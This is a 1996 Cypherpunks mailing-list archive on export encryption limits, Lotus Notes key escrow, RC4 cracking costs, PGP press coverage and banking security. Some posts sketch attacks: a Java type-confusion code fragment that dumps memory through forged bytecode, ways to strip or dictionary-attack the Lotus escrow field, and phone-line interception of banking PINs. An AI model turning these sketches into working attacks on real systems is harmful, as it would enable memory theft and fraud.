He probably should be. I mean, it would mean he only got *one* copy of
mail rather than all those concerned people cc:ing him a copy.

> 
> On the whole, the cypherpunks have gotten very favorable press for a group
> who's actions may render government policies irrelevant and possibly the
> governments themselves.

Mind you, its not as though the government's policies have *ever* been
relevant. Of course, having a less open government in my own country,
no-one has bothered to define what the goverment is going to do re:
trying to enforce low encryption standards or (hah!) censoring the net
in general.

In fact, at least the US *has* a centralish government. Here, where we
have only a handful of quite autonomous states, any one of which could
decide to implement some ridiculous scheme to "crack down on kiddie
porn" which would have the unfortunate effect of removing individual's
rights to privacy.

Which brings me to another point. At least you people *have* a free
speech bit in your constitution. While it's generally considered a
right here, legally that's not really good enough.
--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 26 Jan 1996 23:42:40 +0800
To: cypherpunks@toad.com
Subject: Win95 Registration Wizard info
Message-ID: <3108f533.idoc@idoc.idoc.ie>
MIME-Version: 1.0
Content-Type: text/plain


I picked this link up from the Fringewear list.  It has some interesting
information for quelling rumors and starting new ones.

ftp://ftp.ora.com/pub/examples/windows/win95.update/regwiz.html

The author takes the registration Wizard in Win95 apart and shows exactly
what it does and what it looks for.  Some interesting information about the
encrypted database of product information it uses.

It has a complete list of all of the products that the registration looks
for.  (PGP is not one of them.)  Some interesting facts about what it does
look for however...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 26 Jan 1996 23:54:17 +0800
To: cypherpunks@toad.com
Subject: Attack Simulator
Message-ID: <3108f534.idoc@idoc.idoc.ie>
MIME-Version: 1.0
Content-Type: text/plain



Internet Scanner Software Checks Network Security 
     
Atlanta, Jan. 17 -- Internet Security Systems has
released version 3.2 of its Internet Scanner software. 
The company said the program is an "attack simulator"
that tests your organization's network for security
holes.  

ISS said Internet Scanner 3.2 has enhanced reporting
capabilities and added tests for more than 130 security
vulnerabilities, including the recently revealed
Microsoft File Sharing bug. "Our added focus on Microsoft
security holes stems from our customers' rapid adoption
of TCP/IP (Transmission Control Protocol/Internet
Protocol)-enabled Microsoft Windows NT and Windows 95,"
said Chris Klaus, founder and chief executive officer of
ISS.  

According to Don Ulsch, a security consultant affiliated
with the National Security Institute in Westborough,
Massachusetts, The movement to Windows 95 created a whole
new set of security concerns for network administrators.
"Similar to virus scanning software, a security scanning
tools' value to a corporation declines quickly unless it
can detect the latest security holes. In the security 
arena, every upgrade is crucial," said Ulsch.  

New features of Internet Scanner 3.2 include added
reporting capabilities including hyperlinks that connect
to CERT advisories and vendor World Wide Web sites to
pull down patches and information regarding network
holes, and addition of Linux as a supported platform. The
company said that will allow easy scanning from laptop
PCs.  

The additional tests added to the new version include the
Microsoft File Sharing bug, the TelnetD bug, the Stealth
Scan, Finger Bomb, and misconfigured Linux NIS services. 

The company said its customers who have current
maintenance contracts can now electronically download the
updated version from the USS Web home page at
http://iss.net.  

Internet Security Systems, tel 770-441-2531, fax
770-441-2431  












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Mon, 29 Jan 1996 19:30:55 +0800
To: cypherpunks@toad.com
Subject: [NOISE] FIG_newt/on CIA
Message-ID: <310cb715.idoc@idoc.idoc.ie>
MIME-Version: 1.0
Content-Type: text/plain


[ This came to me from someone at Apple, through our pal Stephan Somogyi ]
[ ...another "your tax dollars hard at work" story... heh.    --dave     ]

................................. cut here .................................

There's an easter egg in the 2.0 Newton (MessagePad 120) which was
"censored" by, yes, the CIA.

Back in '94, one of the Newton software types make a trek to the (very)
small town of Rachel, Nevada, which is located at the edge of a secret
government airbase. The base, called "Area 51," is thought by
UFO-enthusiasts to be filled with alien technology which the government is
in the process of reverse engineering. Meanwhile, the government denies the
very existence of the base, in spite of widespread media coverage ("Larry
King Live from Area 51", etc.).

We figured it'd be funny to put a reference to Area 51 in the Newton --
especially given the substantial overlap between conspiracy buffs and
computer nerds. So, in the "Time Zones" application, contains a world map,
we put an entry for Area 51 in its correct location. Later, we added a
twist -- if the user picks Area 51 from the map, the icons in the datebook
application take on an alien theme. Normally, meetings are represented by
an icon of two people face-to-face, events are represented by a flag, etc.,
etc. But when Area 51 has been chosen, the icon for a meeting is a person
facing an alien, the icon for an event is a flying saucer, a to-do task is
represented by a robot, an so on.

Okay, cute enough. Now cut to August 1995, when the 2.0 ROM has been
declared final, seed units have been in customers' hands for a little
while, and the release is just about ready to go. One of the seed units, it
turns out, was sent to a cryptographer working for the CIA. When he found
that Area 51 was listed at the correct latitude/longitude, he complained to
Apple, demanding the removal of the easter egg and threatening to have his
superiors take the issue to Spindler if necessary. In the end, Newton
management caved in to the demand, and decided to pull the joke out of the
system.

But the ROM was already done -- so the feature was hidden by a software
patch ("System Update") -- but this part of the patch can itself be
removed, and "Area 51" returned to its rightful glory. Here's how to get
the easter egg back:

1) Open the Extras drawer.
2) Switch the folder of the Extras drawer to "Storage".
3) Tap on the icon "Time Zones" and press the "Delete" button.
   Warning -- any cities you've added to your Newton will be lost.
4) Switch the folder of the extras drawer back to "Unfiled icons."
5) Tap on "Time Zones."

You'll find that Area 51 is on the map -- just tap near Las Vegas and
choose Area 51 from the popup. Now look at the icons in Dates. (To purge
the aliens from your PDA, open the back and press reset).







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 30 Jan 1996 02:48:22 +0800
To: cypherpunks@toad.com
Subject: The Lotus Position
Message-ID: <310cf5ba.idoc@idoc.idoc.ie>
MIME-Version: 1.0
Content-Type: text/plain


At 4:03 AM 1/20/96, Bill Stewart wrote:

>40-unknown-bit RC4 may take a week for an ICE workstation or a herd of
>net-coordinated workstations, but it would be much faster to crack on
>a specialized machine actually designed for RC4.  I think Eric's estimate
>was $25-50K for a machine that could do it in 15 minutes, built out of
>programmable gate arrays.  That's not $10,000/crack, or $584, but $0.25-.50.
>Would they crack all the keys they wanted for a quarter each?  Sure;
>at that rate it's probably cheaper to crack them than read them
>(though in reality they'd feed most of them to keyword scanners.)

I take it as self-evidently true that NSA would spend the relatively small
amount of money to build a dedicated key cracker...probably at least
several for each major cipher. "In this room, where we used to have the
famed acre of Crays, now we have tenth of an acre of superfast custom key
crackers."

(Yes, I know the Crays are used for other things besides key cracking. In
fact, their main use probably is not for crypanalysis. Also, I'm not
talking about cracking ciphers that are essentially uncrackable with any
amount of compute power, I'm talking about cracking specific instances of
ciphers with NSA-approved key lengths.)

To consider just how _cheap_ such a dedicated machine is to them, consider
that in the late 50s and early 60s they built the "Harvest" machine, in
conjunction with IBM and based to some extent on IBM's "Stretch" machine,
as I recall. (Bamford has a bunch of stuff on it, and our own Norm Hardy
worked on it for IBM in the early 60s...he gave a good talk at a
Cypherpunks meeting on how big it was, how much it cost, its capabilities,
etc.)

The Harvest machine, and its ancillary units, such as the world's largest
and fastest tractor tape drive, cost something like $100 million in today's
dollars, according to Norm and others. And Harvest was still running in
1975-6, when it was finally replaced by the Cray 1. NSA also funded the
early efforts that later became Control Data Corporation (CDC), and NSA was
a major customer of Seymour Cray's CDC 6600, and the later 7600 (and maybe
even the ill-fated Star). NSA and AEC were also the early customers for the
Cray-1, of course.

This gives you some feel for what kind of expenditures "the Fort" is
prepared to make when it sees the need. And the black budgets of other
intelligence agencies, as described in Richelson's excellent books and
other books (such as "Deep Black," an unauthorized history of the National
Reconnaissance Organization), can only be described as "stupefyingly
large." A surveillance satellite can run upwards of $1.5 billion, so
spending a tiny fraction of that to decrypt what you've sniffed out of the
airwaves is a gimme.

The deep black budget is estimated to be something like $25 billion a year.

Recall that the Wiretap Bill _alone_ provided for up to $500 million for
compliance measures. Clearly the FBI somehow view their surveillance
capabilities as being worth at least this much to them, and probably a lot
more.

Throw in the budgets for the DEA, IRS, FinCen, FBI, BATF, and all the other
agencies fighting the Four Horsemen and the citizen-units who stray outside
the drawn lines, and it's clear that NSA could budget several hundred
million dollars *each and every year* for breaking its "approved ciphers."

Like many, I take it for granted that 40-bit RC4 can be broken for "small
change." Moreover, my guess is that foreign traffic is routinely cracked if
it is encrypted. After all, it's the encrypted traffic that is likeliest to
be interesting. (Sure, some dumbos like Pablo Escobar speak in the clear on
cellphones, but the correlation is definitely in the direction of encrypted
traffic being likelier than unencrypted traffic to contain interesting
stuff. This will become even more the case as more people become educated
and as crypto gets built into more things...this is the intelligence and
law enforcement communities' worse nightmare.)

A $25,000 machine. 4 cracks per hour, 100 per day, and 36,000 per year.
Running for an active life of several years (before being replaced, of
course, by something several times faster/cheaper), there you have the
$0.25 per crack that Bill cites above. Even at 100 times this estimate,
it's cheap. (Not for random vacuuming, but for anything targetted, even
casually.)

And think of what just a few percent of the "Harvest" budget buys you: 100
of these machines. Several million cracks per year. And from these cracks,
think of the correlations, the contact lists, and the further targetting
that can be done.

[Sidebar: One thing that bothers me about any of these LEAF-related
schemes--and I don't know if and how the Lotus scheme checks both ends for
compliance, etc.--is that they are fundamentally at odds with remailers
which hide the origin. If remailers are allowed to continue to exist,
schemes involving LEAF fields won't work. Unless I've forgotten how these
things work in the couple of years since I last looked at Clipper et. al.
in depth. So, I expect a move against remailers as part of the campaign.
And with no remailers, if this could ever be enforced, the ability to make
contact lists based on random decryption is frightening.]

Back to their 100 machines....

My guess is that they haven't even bothered to buy this many machines, that
the intelligence they get from a few tens of thousands of cracks is more
than enough to point to further leads, to trigger additional HUMINT, etc.

But even if the estimates are off by orders of magnitude, we know that a
40-bit RC4 can be cracked in ~hours with ~hundreds of Sun-class machines.
(Personally, I think it obvious the NSA has at least speeded up this work
factor by at least a factor of ten.) This is also essentially a minor
consideration compared to the amount of work done in ordinary wiretaps.

And in a few years, 40-bit RC4 will be even more ludicrously weak.

The Lotus position is untenable.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 25 Jan 1996 18:07:52 +0800
To: cypherpunks@toad.com
Subject: Hack Java
Message-ID: <9601231630.AA07540@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


This illustrates the difference between a language with no dangerous
constructs, and one where you must trust the implementation.
>From some internal OSF email:
---------- Begin Forwarded Message ----------

class Data { // an object storing 16 bytes 
	byte word[16];
}


class Trick {
	Data data;
	long tricky_pointer;
	}


Now suppose, I fake a compiler (or I have a malicious compiler)
and I generate by hand malicious byte code such that
in the symbol tables, tricky_pointer and data have the same
offset.


Then if I have the code

	tricky_pointer = 10000;
	for (; tricky_pointer < 50000 ;) {
		dumptofile(trick.data)
		tricky_pointer += 16;
	}

what I am doing with this code is that I am actually setting the data
object reference to point to address 10000, then I am core dumping the
contents of memory upto address 50000, 16 bytes at a time! The byte
code is completely legal, I have cheated with the field offsets so
that I can access to the same memory as two different types.

In order to detect that the byte code verifier must verify that
all the fields of an object do not overlap in their memory
layout. That's what has to be checked.

----------- End Forwarded Message -----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: br@scndprsn.Eng.Sun.COM (Benjamin Renaud)
Date: Sat, 27 Jan 1996 15:19:03 +0800
To: crypto@midex.com
Subject: Re: Hack Java
Message-ID: <199601240001.QAA25104@springbank.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



]Both of you are correct if you look carefully at the assumptions.  Rich 
]assumes that you have a 'malicious compiler'.  Godmar is right that Java 
]does not utilize pointers in the byte code.  What would make the entire 
]scenario work is a malicious interpreter or a 'NotJava Browser'(TM) that 
]allowed malicious code to be executed.  Couple a bad compiler and a bad 
]interpreter and you are in buisness (nasty business that is).

Yes. And if you also let an intruder in your house, have them sit at
your computer with your newborn child in the room and go on vacation,
things can get really, really nasty.

Sort of like when you execute untrusted code in an untrusted
environment...

-- Benjamin
   Java Products Group




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 25 Jan 1996 02:28:25 +0800
To: weld@l0pht.com>
Subject: Re: [local] Report on Portland Cpunks meeting
Message-ID: <2.2.32.19960124002635.008c27e8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:40 PM 1/23/96 -0500, Perry E. Metzger wrote:
>
>Weld Pond writes:
>> This begs the question, "How would you conduct an efficient key signing 
>> given what you have learned?" I am in the process of organizing one and 
>> would like to get input as to the best way that this should take place.  
>
>The IETF key signing parties are the largest in existance -- about 100
>people exchange signatures.
>
>The way you handle it is this:

{key signing stuff deleted for space]

That was the basic format we used.  The only difference was that the keys
were collected before hand and distributed on disk.

The biggest problems were due to unfamiliarity was to what to bring and
procedure from an experience point of view.  (Lack of key fingerprints were
a problem.)

The key signing rules were published, but many people attending did not read
them.  (They were part of an update announcement.  Many people read the top
part, saw nothing had changed and skipped the rest of it...)

Now that we have done it once, it will be alot easier the next time.
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 25 Jan 1996 12:31:48 +0800
To: Simon Spero <perry@piermont.com>
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
Message-ID: <m0tevYq-0008y2C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:21 PM 1/23/96 -0800, Simon Spero wrote:
>On Tue, 23 Jan 1996, Perry E. Metzger wrote:
>
>> Alan Horowitz writes:
>>>[...] 
>> Okay. I think I understand. You're a fruitcake. Easy enough.
>
>The official pastry of the 1996 Cypherpunks.
>
>One might note that Zimmerman isn't, er, a common name for yer typical 
>Neo-Nazi... This sort of accusation is sufficient grounds for libel in 
>the UK (such accusations have been found to be defamatory, and would 
>almost certainly be settled within a few days. 
>
>Of course Phil (Hallam Baker) has more experience with this sort of
>thing... 
>Simon

Maybe this is common knowledge, but the name "Zimmermann" and crypto had 
another relationship, in World War I.  If anybody knows more about this 
incident than my vague recollection of the famous "Zimmermann cipher" would 
you care to tell the story?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 25 Jan 1996 10:25:05 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Unzipping pgp for vax (fwd)
Message-ID: <Pine.LNX.3.91.960123192018.1008D-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cpunks, 

i got this in the mail this morning.  here's another blatant case 
of illegal export.  names and exact addresses removed to protect the 
clueless.


- --
"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)

zifi runs LINUX 1.3.57 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 

- ---------- Forwarded message ----------
Date: Tue, 23 Jan 1996 16:40:30 +0100 (MET)
From: XXXXX XXXXXX <CLUELESS@SOME.VAX.IT>
To: finerty@MSSCC.MED.UTAH.EDU
Subject: Unzipping pgp for vax

Patrick,
I got a copy of vaxpgp262.tar.Z from ftp.csua.kerkeley.edu.
I have a problem using unzip to decompress it.
What kind of unzip I need ?

Thanks a lot.
XXXXXXX


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMQWYGk3Qo/lG0AH5AQFRIAP/VcJdbDyebUti3IO19IrH3FBlfk4laxDJ
8S3zTHmlFu4PVCMnLTvMa+JBQFy9nrY2Yv9L9Q4B/Y+ppkEJISjNuI4RXdJCebHo
5Flq61ycBUsyawWojjp2b2p2zURLlqv0WTkfkl6GvJZyWMbOdCId0212j/E2C/ze
dVkumDfGqwk=
=71Fx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Thu, 25 Jan 1996 11:31:19 +0800
To: cypherpunks@toad.com
Subject: Lotus Notes
Message-ID: <01I0D1I8O4VI98E2HT@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 18 Jan 1996 20:54:33 -0500
>From: daw@beijing.CS.Berkeley.EDU (David A Wagner)
>Subject: Re: Hack Lotus?

>Hack Lotus?  Please do.

Perhaps in this case, c2.org could have a "patch Lotus" contest,
instead.  Help us patch this dumb security hole, by which we're
leaking 24 bits of each session key.

>I would love to see the internals of how Lotus Notes does the escrow.
>Every conceivable way I can see to do it seems very vulnerable to attack.
>
>If the receiving Lotus Notes program doesn't check whether the high 24
>bits have been escrowed correctly in the LEEF-like field, then a simple
>hack to the sending Lotus Notes program to not send the LEEF field
>should give foreigners true 64 bit encryption.

I think this is the case.  The guy who spoke at the RSA conference
made reference to the fact that this new version would interoperate
with full-strength domestic versions.  Getting domestic versions to
check for LEAFs only from foreign users is possible, but it would
seem to require that Lotus was working on this idea several versions
back.  Otherwise, when an old domestic version gets a message from a
new foreign version, it's going to accept the message without a
LEAF.  Depending on how Lotus Notes does their key exchange
protocol, it may be possible to graft this kind of checking on, so
that the older programs will work with it, too, but this doesn't
seem likely at all.

>If the receiving Lotus Notes program does verify that the high 24 bits
>are escrowed correctly, then anyone can verify that, so in 2^24 trials,
>I can recover the high 24 bits, and with 2^40 more trials, I can recover
>the high 40 bits.  Therefore 2^40 + 2^24 trials should suffice to hack
>Lotus if this is how it works.

This problem is solvable, though I doubt they've bothered.  Two
ways come to mind--both using information that third parties won't
have to fix the problem.

1.   Put another 64 bits of random salt into the RSA key exchange
blob.  Use this to pad the LEAF, so that it's not feasible to
dictionary search the LEAF.

2.   Define the LEAF as part of the RSA key exchange blob.  Pad the
LEAF with random bits, unknown to the receiver.  Sign the whole key
exchange blob.

Note that #2 can be countered by hacking the software's copy of the
public key.  I don't see a way of countering #1 on the sender side
only.  (Once you get the sender and receiver working together,
key escrow seems to become really hard to do.)

Now, I'm very interested in whether they thought about this as a
potential problem, and thus padded their LEAF intelligently, or left
themselves vulnerable to a dictionary-style attack on the LEAF.
This translates, roughly, to "was someone with a basic understanding
of cryptography involved in this design?"  Clearly, IBM has some
really good people, and I suspect Lotus did/does, as well.  But were
they involved enough in the implementation to ensure that this was
done intelligently?

- From what I heard at the conference, though, I don't think they're
even checking to ensure compliance.  This implies that the security
patch can be pretty simple--clobber the LEAF field with a bunch of
random-looking bits.  Of course, this tells us nothing about the
other possible weaknesses.  How well does Notes generate key
material?  How big are the RSA keys?  How well do things like the
key exchange protocols work?  It looks to me like there are a lot of
programs with encryption out there that are lucky to manage even 40
bits of actual security, even if they're allowed 64- or 128-bit
keys.

>Waiting to hear the technical details of how it works,
>- -- Dave Wagner

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQUVGkHx57Ag8goBAQHaRwP/er3/94io/Aa5MQyyluVqohHGyLcP5JBr
ZGZMoMydeGnWp5HJ5oGO4WuWDmmqk1NNiHNFd3z8Yxt9S73LR7PvGtoyoucMkX69
f9p4DMED+bJoMWtfukxhtWufeTKDE136eUi/V8155869nAZSHngIF3WLaQCBWFqe
01WEP/GbZtg=
=IDZU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 25 Jan 1996 06:56:34 +0800
To: cypherpunks@toad.com
Subject: Lotus, NSA sing in same key
Message-ID: <2.2.32.19960123150421.0067c0c0@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Article of that title in Jan 22 issue of EE Times:

"San Francisco - IBM subsidiary Lotus Development Corp. offered an olive branch of sorts to the National Security Agency (NSA) last week, at the opening of the RSA Data Security Conference at the Fairmont Hotel. The Iris Associates unit of Lotus that developed Lotus Notes will be able to ship an international version with the equivalent [!!] of 64-bit encryption, using a concept Lotus calls "Differential Workfactor Cryptography".
In the past, NSA has blocked the State Department from issuing broad licenses for packages with encryption of 40 bits or stronger. The Business Software Alliance argues that this has jeopardized sales of U.S. software overseas. The NSA has unsuccessfully tried to get U.S. manufacturers to use the Clipper chip or its software equivalent (based on a classified encryption algorithm) or an unclassified "key escrow" algorithm in which decryption keys must be held by third parties. OEMs have rejected all key-escrow concepts and have demanded international export rights for public-key cryptography methods promoted by vendors such as RSA.
Lotus's compromise with the NSA concedes the agency's right to conduct signals intelligence on foreign targets. The encryption in Notes Release 4 is based on a 64-bit random number. But for the exported version of Release 4, the NSA generates a public-key algorithm and encrypts 24 bits of the key using the public RSA key. The result of this operation, the Workfactor Reduction Field [!?], is bound to the encrypted data. Foreign hackers will find the encrypted messages as difficult to decrypt as a message with a 64-bit RSA key, but the NSA will find it as easy to crack as a message with a 40-bit key."

EE Times, Jan 22, 1996, page 116 sidebar
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Thu, 25 Jan 1996 12:37:34 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: "PRZ a nazi" to be retracted
Message-ID: <199601240458.EAA28033@maalox>
MIME-Version: 1.0
Content-Type: text


The Sunday Telegraph of London printed a story last Sunday about neo-nazis
using PGP to encrypt their communications.  The story said that PGP was
devised by an American neo-nazi sympathizer.  As the creator of PGP, and
a human rights activist, I was outraged by such a defamation from a major
newspaper.  I called my lawyer Phil Dubois, who seemed to look forward to
having some fun with this newspaper.

Not wanting to wait around till the morning, and slow lawyers, I called
Robin Gedye, the reporter in Bonn who wrote the story, at 7am Monday morning
Bonn time, and woke him up at home.  I introduced myself and told him how I
felt about it.  He had never heard of me, the Clipper chip, the controversies
of cryptography, and knew nothing about PGP outside of the couple of
sentences in his story that mentioned PGP.  He said it wasn't really so bad,
because he didn't specifically identify me by name.  One can imagine the
effectiveness of that excuse with me.  I then went into some detail with him
to bring him up to speed.  I also called his editor in London, who also had
never heard of me or PGP.

After some checking, they discovered that the Daily Telegraph, a related
newspaper, had run an article about my case just a week before.  They also
found about 20 recent articles on me in the UK press.  The editor said that
my story "checks out".  It was good to know that they now believed that I
was not a neo-nazi after all.

Anyway, Mr. Gedye says that the Sunday Telegraph will print a retraction
next Sunday.  Not just a little retraction, but a whole article on the
subject, written by Mr. Gedye himself.  I'm glad to see that this probably
means that he will dig into the subject more, in order to write such an
article.

I guess this means maybe I'll find some other things to occupy Phil Dubois's
time.

  -Philip Zimmermann
   23 Jan 96




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 26 Jan 1996 04:34:11 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes
Message-ID: <v02120d55ad2b86f79513@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:02 1/23/96, JMKELSEY@delphi.com wrote:
[...]
>Now, I'm very interested in whether they thought about this as a
>potential problem, and thus padded their LEAF intelligently, or left
>themselves vulnerable to a dictionary-style attack on the LEAF.
>This translates, roughly, to "was someone with a basic understanding
>of cryptography involved in this design?"  Clearly, IBM has some
>really good people, and I suspect Lotus did/does, as well.  But were
>they involved enough in the implementation to ensure that this was
>done intelligently?

You are assuming that they *want* the hole to be unpatchable. I see no
reason why they should. "We tried out best, but these darn hackers found a
way to enable full 64 bits. Sorry, but we tried." Perhaps the most
intelligent thing to do was to keep the GAK subject to a simple patch.



-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 25 Jan 1996 13:15:05 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <ad2b4efa0102100435ee@[205.199.118.202]>
Message-ID: <310612A1.69E7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


-- Timothy C. May wrote:
> 
> At 9:29 AM 1/24/96, Jeff Weinstein wrote:
> 
> >  I suspect that to get around the US government in this way we
> >would have to develop the entire product outside of the US.  That
> >would be a very drastic move that is not likely to happen any
> >time soon.  We are going to invest some money and effort into
> >trying to get the current restrictions lifted first.
> 
> For what it's worth, this is what I've heard several knowledgeable lawyers
> say is the case, that merely sending the crypto experts abroad is no
> solution, that the entire product (or some large fraction of it) must be
> foreign-originated.
> 
> The usual issue: That if a foreign-originated product even appears to be a
> standard (so far, none have been), and includes strong crypto, then the NSA
> and other agencies will simply change the rules. Thus, if extremely strong
> crypto from "Netscape-Zurich" starts to have a significant market presense
> in the U.S., then some law will be passed to restrict it.

  Another problem is that the government may consider any "help" provided
to the foreign entity to be evidence of a conspiracy.  When Eric Young
released SSLEAY we got a call from someone in the State Department
(probably some lackey paid for by the NSA) to find out if we provided
him with any "help" in doing his implementation.  Since he did it all
on his own from the published spec and was able to test interoperability
over the internet we were off the hook, but they seemed to be prepared
to come down on us if we had "conspired" with him.

	--Jeff

Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mmarkowi@interramp.com (Michael J. Markowitz)
Date: Sat, 27 Jan 1996 15:17:13 +0800
Subject: Re: SHA-2
In-Reply-To: <Pine.3.89.9601171231.A16122-0100000@aix2.uottawa.ca>
Message-ID: <DLoBtr.IyF@news.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


wlkngowl@unix.asb.com (Mutatis Mutantdis) wrote:


>>Schneier mentioned last year in one of his conference reports that SHA
>>was being revised, yet I couldn't find it in Applied Crypto 2 (I admit
>I don't know if the revision is official or proposed. I first heard
>about it in a post to alt.security (I saved the message somewhere)

Official--it's called FIPS PUB 180-1.
Michael J. Markowitz, VP R&D     mjmarkowitz@attmail.com
Information Security Corp.       847-405-0500
Deerfield, IL  60015             Fax: 847-405-0506





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 25 Jan 1996 00:23:10 +0800
To: cypherpunks@toad.com
Subject: German home banking (fromn RISKS)
Message-ID: <v01530500ad2bfe6d4743@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------------

Date: Tue, 23 Jan 1996 17:32:56 +0100
From: Klaus Brunnstein <brunnstein@rz.informatik.uni-hamburg.d400.de>
Subject: Homebanking NonSecurity demo

A German private TV channel (SAT 1) displayed, Monday Jan.22 night (10 pm),
a demonstration of how easily homebanking may be attacked in Germany. In
this demo, a person used T-Online (a navigation tool similar to CompuServe)
to send his ID, PIN, the amount to be transferred (500 DM) and the account
to which to transfer, plus a transaction number (TAN) via telephone line.
All these data were intercepted on a portable connected to the user's phone
line in the basement of the building (indeed, most telephone boxes are
rarely locked). Actions of the customer and the "hacker" were shown in
parallel, so one could see all data (including PIN which was not displayed
on the Customers' screen) on the hackers' display. Before the customer could
start the booking process on the bank computer by sending the requestor, the
hacker interrupted the telephone connection. As he now possessed all
relevant "secret" information of the user, he now started an order to
transmit 5,000 DM from his victim's account to another one, successfully (as
the customers' vouchers proved. After the demo (about 10 minutes), a short
interview (with the author of this report) discussed evident risks; it was
made clear that software solutions are available since some time, to replace
the old PIN/TAN structure with digital signatures and to encrypt sensitive
data using asymmetric encryption.

Risks? Presently, there are several risks in telephone-based homebanking.
First, ALL sensitive information is transmitted in cleartext. Secondly,
interception of line-based communications of German Telekom is easily
possible at several sites, from the basement of a customers' house where
lines from different customers are collected in a unit, to units
collecting lines from several blocks, streets etc. Thirdly, in contracts
between banks and customers, the latter will often have difficulties to
prove that an order carrying their personal ID, TAN etc was NOT issued
from them, esp. when there is evidence that the order came from the
customers' telephone line (though not from his telephone :-). Customer
protection (both technically and legally) therefore requires immediate
action, as Chaos Computer Club commented in press.

Interestingly, German banks offer enterprises a secure solution based on
RSA-licensed encryption software. So far, this is NOT offered to private
customers as it canNOT interoperate with T-Online. Financial institutions
are discussing presently a solution (either with a chipcard including sort
of DES or a solution using an RSA-implementation with 784 bit key, which may
be distributed via diskettes) but it is unclear when this solution will be
available. As long as such solution is not available, "every day may become
payment day even for the most lousy hackers" as one German newspaper (TAZ)
wrote.

Klaus Brunnstein (Jan.23,1996)

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






